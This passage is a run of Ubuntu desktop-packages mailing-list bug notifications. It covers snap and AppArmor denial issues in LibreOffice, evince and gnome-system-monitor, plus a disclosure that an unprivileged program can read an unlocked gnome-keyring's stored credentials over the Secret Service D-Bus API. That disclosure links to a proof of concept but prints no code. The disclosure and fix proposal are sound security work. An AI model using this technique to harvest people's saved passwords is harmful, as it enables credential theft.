adding-a-new-bamf-desktop-file-hint-environment-hint also discussed this issue, but the card is archived and therefore it won't be worked on. I'm having trouble finding a simple reproducer (other than chrome- test) but am told by Marco that the BAMF matching will always work if BAMF_DESKTOP_FILE_HINT in the process' environment always points to the desktop file in /var/lib/snapd/desktop/applications. I will continue to look for a simple reproducer. To manage notifications about this bug go to: https://bugs.launchpad.net/snappy/+bug/1643910/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1780365] Re: Credentials located in gnome-keyring can be compromised easily
Thank you for reporting this bug. The access via DBus when the keyring is unlocked is a well-known issue and the design of the feature as explained when reading the entirety of https://wiki.ubuntu.com/SecurityTeam/FAQ#gnome-keyring. Users who prefer to be prompted can choose to use a separate keyring than the one that is automatically unlocked upon successful login. That said, I'm not clear if you are saying that the keyring is not locked during screensaver or logout. If either of these is the case, that sounds like a bug. Can you confirm and detail your methodology? -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to gnome-keyring in Ubuntu. https://bugs.launchpad.net/bugs/1780365 Title: Credentials located in gnome-keyring can be compromised easily Status in gnome-keyring package in Ubuntu: New Bug description: Dear all, I figure out that login credentials, located in gnome-keyring, can be easily compromised. Linux based on Gnome basically uses ‘gnome-keyring’ as their backend to store login credentials in a secure manner. Specifically, google- chrome browser, network-manager and gnome-online-accounts use this as a backend solution to store login credentials. To use this, authentication is performed together with gnome-keyring as part of ‘pam-gnome-keyring.so’. At this point, it remains unlocked until system is shut down or logged out. In this state, a simple program that uses ‘Secret Service API’ call and their ‘D-Bus’ interface can easily retrieve login credentials from those gnome-keyring without any privilege escalation, listening into the X events going to another window, or installation an application on target computer. (please check PoC source https://github.com/sungjungk/keyring_crack and video https://youtu.be/Do4E9ZQaPck) The issue is different from the content shown on the Ubuntu Security FAQ and GnomeKeyring Wiki [1][2]. It was even said that “PAM session is closed via the screensaver, all keyrings are locked, and the ‘login’ keyring is unlocked upon successful authentication to the screensaver”. After trying to crack the keyring, it was far from what they really thought. It is no different than plain text file for login credentials somewhere on disk. To deal with, the root cause of the problem is that ‘Secret Service API’ on anyone can be easily accessed on DBus API. If access control is enabled, only well-known? or authorized processes, such as google- chrome, network-manager, and gnome-online-accounts, will be able to access the login credentials. DBus originally provides capability that is essential to access control of DBus API by defining security policy as a form of *.conf file. Currently, various services based on DBus interface are employing above security policy feature to perform access control. For example, login/system related functions is controlled from ‘login1’ and its security policy is described in “org.freedesktop.login1.conf”. (see https://github.com/systemd/systemd/blob/master/src/core/org.freedesktop.systemd1.conf) Likewise, why don’t we try adopting the access control of secret service API into gnome-keyring environment? Due to the fact that a process with root privilege can access “.conf” file, an approved program may only update the target file during installation process Here is really simple ‘org.freedesktop.secrets.conf’ example. = http://www.freedesktop.org/standards/dbus/1.0/busconfig.dtd;> = Many Thanks!! [1] https://wiki.ubuntu.com/SecurityTeam/FAQ#Contact [2] https://wiki.gnome.org/Projects/GnomeKeyring/SecurityPhilosophy ProblemType: Bug DistroRelease: Ubuntu 18.04 Package: gnome-keyring 3.28.0.2-1ubuntu1 ProcVersionSignature: Ubuntu 4.15.0-20.21-generic 4.15.17 Uname: Linux 4.15.0-20-generic x86_64 ApportVersion: 2.20.9-0ubuntu7.2 Architecture: amd64 CurrentDesktop: ubuntu:GNOME Date: Thu Jul 5 17:45:22 2018 InstallationDate: Installed on 2018-07-06 (0 days ago) InstallationMedia: Ubuntu 18.04 LTS "Bionic Beaver" - Release amd64 (20180426) ProcEnviron: TERM=xterm-256color PATH=(custom, no user) XDG_RUNTIME_DIR= LANG=en_US.UTF-8 SHELL=/bin/bash SourcePackage: gnome-keyring UpgradeStatus: No upgrade log present (probably fresh install) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/gnome-keyring/+bug/1780365/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1802911] Re: [snap] LibreOffice 6.1.3.2 (90) doesn't launch
FYI, '@{PROC}/version r,' is in the default apparmor template. -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to libreoffice in Ubuntu. https://bugs.launchpad.net/bugs/1802911 Title: [snap] LibreOffice 6.1.3.2 (90) doesn't launch Status in libreoffice package in Ubuntu: Invalid Bug description: LibreOffice doesn't launch on 6.1.3.2 (90) in `candidate` on core 16-2.36.1+git1007.f72779e (5920) in `edge`, it just hangs, with no Terminal output, but has the following denials in `journalctl -f`: ``` Nov 12 12:38:19 adam-thinkpad-t430 audit[31984]: AVC apparmor="DENIED" operation="open" profile="snap-update-ns.libreoffice" name="/proc/version" pid=31984 comm="3" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 Nov 12 12:38:19 adam-thinkpad-t430 kernel: audit: type=1400 audit(1542026299.589:542): apparmor="DENIED" operation="open" profile="snap-update-ns.libreoffice" name="/proc/version" pid=31984 comm="3" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 ``` ``` $ snap info libreoffice tracking: candidate refresh-date: 6 days ago, at 08:50 GMT channels: stable:6.1.2.1 (86) 501MB - candidate: 6.1.3.2 (90) 507MB - < beta: ↑ edge: ↑ installed: 6.1.3.2 (90) 507MB - $ snap version snap2.36.1+git1007.f72779e~ubuntu16.04.1 snapd 2.36.1+git1007.f72779e~ubuntu16.04.1 series 16 ubuntu 18.10 kernel 4.18.0-11-generic $ snap info core tracking: edge refresh-date: today at 12:08 GMT channels: stable:16-2.35.5 (5742) 92MB - candidate: 16-2.35.5 (5742) 92MB - beta: 16-2.36.1 (5897) 92MB - edge: 16-2.36.1+git1007.f72779e (5920) 92MB -< installed: 16-2.36.1+git1007.f72779e (5920) 92MB core ``` To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/libreoffice/+bug/1802911/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1798091] Re: thumbnailer cannot create tempfiles (with apparmor denials)
** Also affects: evince (Ubuntu Disco) Importance: High Assignee: Sebastien Bacher (seb128) Status: Fix Released ** Changed in: evince (Ubuntu Disco) Status: Fix Released => Triaged -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to evince in Ubuntu. https://bugs.launchpad.net/bugs/1798091 Title: thumbnailer cannot create tempfiles (with apparmor denials) Status in evince package in Ubuntu: Triaged Status in evince source package in Cosmic: Fix Committed Status in evince source package in Disco: Triaged Status in evince package in Debian: Unknown Bug description: * Impact Nautilus fails to generate previews for pdf files * Test case Download/copy a pdf, open the directory in nautilus, a preview image should be displayed * Regression potential Check that there are no other apparmor denials and the thumbnailer works - While trying to create thumbnails in a directory from within nautilus, I got: [781429.784125] audit: type=1400 audit(1539694722.247:989): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30937 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 [781429.940592] audit: type=1400 audit(1539694722.403:990): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30941 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 [781430.314591] audit: type=1400 audit(1539694722.779:991): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30945 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 [781431.283522] audit: type=1400 audit(1539694723.747:992): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30949 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 [781431.518566] audit: type=1400 audit(1539694723.983:993): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30953 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 ProblemType: Bug DistroRelease: Ubuntu 18.10 Package: evince 3.30.1-1 ProcVersionSignature: Ubuntu 4.18.0-8.9-generic 4.18.7 Uname: Linux 4.18.0-8-generic x86_64 ApportVersion: 2.20.10-0ubuntu13 Architecture: amd64 CurrentDesktop: ubuntu:GNOME Date: Tue Oct 16 14:59:00 2018 InstallationDate: Installed on 2014-06-19 (1580 days ago) InstallationMedia: Ubuntu 14.04 LTS "Trusty Tahr" - Release amd64 (20140417) ProcEnviron: TERM=xterm-256color PATH=(custom, no user) XDG_RUNTIME_DIR= LANG=de_DE.UTF-8 SHELL=/bin/bash SourcePackage: evince UpgradeStatus: Upgraded to cosmic on 2018-10-07 (9 days ago) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/evince/+bug/1798091/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1798091] Re: thumbnailer cannot create tempfiles (with apparmor denials)
Uploaded 3.30.1-1ubuntu1.2 to cosmic-proposed. ** Changed in: evince (Ubuntu) Status: In Progress => Fix Committed -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to evince in Ubuntu. https://bugs.launchpad.net/bugs/1798091 Title: thumbnailer cannot create tempfiles (with apparmor denials) Status in evince package in Ubuntu: Fix Committed Status in evince package in Debian: Unknown Bug description: * Impact Nautilus fails to generate previews for pdf files * Test case Download/copy a pdf, open the directory in nautilus, a preview image should be displayed * Regression potential Check that there are no other apparmor denials and the thumbnailer works - While trying to create thumbnails in a directory from within nautilus, I got: [781429.784125] audit: type=1400 audit(1539694722.247:989): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30937 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 [781429.940592] audit: type=1400 audit(1539694722.403:990): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30941 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 [781430.314591] audit: type=1400 audit(1539694722.779:991): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30945 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 [781431.283522] audit: type=1400 audit(1539694723.747:992): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30949 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 [781431.518566] audit: type=1400 audit(1539694723.983:993): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30953 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 ProblemType: Bug DistroRelease: Ubuntu 18.10 Package: evince 3.30.1-1 ProcVersionSignature: Ubuntu 4.18.0-8.9-generic 4.18.7 Uname: Linux 4.18.0-8-generic x86_64 ApportVersion: 2.20.10-0ubuntu13 Architecture: amd64 CurrentDesktop: ubuntu:GNOME Date: Tue Oct 16 14:59:00 2018 InstallationDate: Installed on 2014-06-19 (1580 days ago) InstallationMedia: Ubuntu 14.04 LTS "Trusty Tahr" - Release amd64 (20140417) ProcEnviron: TERM=xterm-256color PATH=(custom, no user) XDG_RUNTIME_DIR= LANG=de_DE.UTF-8 SHELL=/bin/bash SourcePackage: evince UpgradeStatus: Upgraded to cosmic on 2018-10-07 (9 days ago) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/evince/+bug/1798091/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1798091] Re: thumbnailer cannot create tempfiles (with apparmor denials)
I'll be updating a new version on top of Seb's changes. Marking back to In Progress for now. ** Changed in: evince (Ubuntu) Status: Fix Committed => In Progress -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to evince in Ubuntu. https://bugs.launchpad.net/bugs/1798091 Title: thumbnailer cannot create tempfiles (with apparmor denials) Status in evince package in Ubuntu: In Progress Status in evince package in Debian: Unknown Bug description: * Impact Nautilus fails to generate previews for pdf files * Test case Download/copy a pdf, open the directory in nautilus, a preview image should be displayed * Regression potential Check that there are no other apparmor denials and the thumbnailer works - While trying to create thumbnails in a directory from within nautilus, I got: [781429.784125] audit: type=1400 audit(1539694722.247:989): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30937 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 [781429.940592] audit: type=1400 audit(1539694722.403:990): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30941 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 [781430.314591] audit: type=1400 audit(1539694722.779:991): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30945 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 [781431.283522] audit: type=1400 audit(1539694723.747:992): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30949 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 [781431.518566] audit: type=1400 audit(1539694723.983:993): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30953 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000 ProblemType: Bug DistroRelease: Ubuntu 18.10 Package: evince 3.30.1-1 ProcVersionSignature: Ubuntu 4.18.0-8.9-generic 4.18.7 Uname: Linux 4.18.0-8-generic x86_64 ApportVersion: 2.20.10-0ubuntu13 Architecture: amd64 CurrentDesktop: ubuntu:GNOME Date: Tue Oct 16 14:59:00 2018 InstallationDate: Installed on 2014-06-19 (1580 days ago) InstallationMedia: Ubuntu 14.04 LTS "Trusty Tahr" - Release amd64 (20140417) ProcEnviron: TERM=xterm-256color PATH=(custom, no user) XDG_RUNTIME_DIR= LANG=de_DE.UTF-8 SHELL=/bin/bash SourcePackage: evince UpgradeStatus: Upgraded to cosmic on 2018-10-07 (9 days ago) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/evince/+bug/1798091/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1798996] Re: cannot perform readlinkat() on the mount namespace file descriptor of the init process: Permission denied
What is the output of: $ snap version -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to gnome-system-monitor in Ubuntu. https://bugs.launchpad.net/bugs/1798996 Title: cannot perform readlinkat() on the mount namespace file descriptor of the init process: Permission denied Status in gnome-system-monitor package in Ubuntu: Incomplete Bug description: $ gnome-system-monitor cannot perform readlinkat() on the mount namespace file descriptor of the init process: Permission denied And it does not start at all. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/gnome-system-monitor/+bug/1798996/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp